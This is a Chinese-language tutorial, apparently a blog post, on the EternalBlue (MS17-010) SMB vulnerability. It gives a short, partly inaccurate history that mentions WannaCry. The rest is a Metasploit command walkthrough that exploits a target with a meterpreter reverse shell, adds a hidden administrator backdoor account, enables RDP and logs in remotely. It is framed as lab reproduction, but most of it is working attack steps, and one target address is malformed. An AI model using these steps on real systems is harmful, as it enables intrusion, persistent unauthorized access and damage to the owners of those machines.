永恒之蓝概述
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,
不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。
漏洞复现:
kali 终端输入 msfconsole #打开msf框架
msf6 > search ms17-010 # 搜索漏洞相关的攻击模块
msf6 > use 3 #使用攻击验证的模块来探测是否存在漏洞
show options # 查看模块怎么使用
set RHOSTS 192.168.0.31 # 设置目标
run # 开始攻击
search ms17-010 # 寻找攻击模块
use exploit/windows/smb/ms17_010_eternalblue #使用攻击模块
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷
show options # 查看模块怎么使用
set RHOSTS 192.253.136 # 设置攻击目标
exploit #开始攻击 也可以用run
screenshot # 截图
shell #获取一个交互式的shell
chcp 65001 #修改编码为UTF-8
net user # 查看自己电脑都有哪些用户
net user 用户名 密码 /add # 向目标机器添加后门账户
net localgroup administrators 用户名 /add #把指定用户加入管理员组
exit # 退出之后,来到 meterpreter 会话
让目标允许被连接
meterpreter > run post/windows/manage/enable_rdp
远程登录其计算机
rdesktop 192.168.253.136